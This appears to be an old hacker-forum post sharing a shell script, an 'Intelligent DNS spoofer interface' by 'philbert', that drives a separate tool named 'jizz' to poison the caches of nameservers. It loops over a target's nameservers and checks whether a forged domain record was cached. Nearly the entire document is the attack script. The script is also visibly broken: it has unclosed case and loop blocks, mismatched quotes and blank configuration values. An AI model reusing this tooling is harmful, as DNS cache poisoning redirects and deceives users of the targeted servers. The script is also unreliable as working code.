Please do not email me asking where to get jizz. If you don't have
it I'm not going to give it to you. Also the return email in the script
does not have an MX *yet* so if you want to reach me I can be found on
irc efnet as philbert.
here is the script:
--- begin ---
# This script requires perl and the latest version of sh-utils for calculations,
# as well as other various standard unix utilities.
# This interface DOES NOT require you to know the cacheing nameserver of
# the destination server, it will attempt to calculate it for you.
case "${3}" in
echo "Intelligent DNS spoofer interface, by philbert."
echo "(philbert@DataTrax.Net)"
echo "usage: $0 <your ip> <spoofed domain> <irc/misc server>"
echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"
exit 1
# ----------------------------------------------------------
# Set the configurations for your nameserver here
# The name of the nameserver this is running on:
# The IP address of the nameserver this is running on:
# A domain that this nameserver is strictly authorative for:
# End of user configuration
# ----------------------------------------------------------
export RAND
jizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &
sleep 1
if [ "$3" = "-ns" ]; then
echo "echo "trying to cache $2 on $4..."
nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1
echo "$1 is cached on $2 as `nslookup $1 $2 | grep Name | cut -c10-`
exit 1
else false ; fi
NS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`
if [ "NS" = "" ]; then NS=$3; else NS=$NS; fi
echo "trying to cache $2 on the server itself..."
nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1
TEST=`nslookup $1 $3 | grep Name | cut -c10-`
if [ "$TEST" = "$2" ]; then
echo "Success!, $2 is cached on $3 as $1"
else echo "Failed..."; fi
RDEST=`nslookup $NS | grep Name | cut -c10-`
if [ "$RDEST" = "" ]; then RDEST=$3; else RDEST=$RDEST; fi
NS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`
if [ "$NS" = "" ]; then
NS=`echo $RDEST | cut -f2- -d.`
NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`
else NS=$NS; fi
while true ; do
TARGET=`echo $NS | cut -f$CRUNCH -d" "`
if [ "$TARGET" = "" ]; then
killall -9 jizz >/dev/null &
exit 1; else TARGET=$TARGET; fi
echo "trying to cache $2 on $TARGET..."
nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1
TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`
if [ "$TEST" = "$2" ]; then
echo "Success!, $2 is cached on $TARGET as $1"
else echo "Failed..."; fi
CRUNCH=`expr $CRUNCH + 1`
--- end ---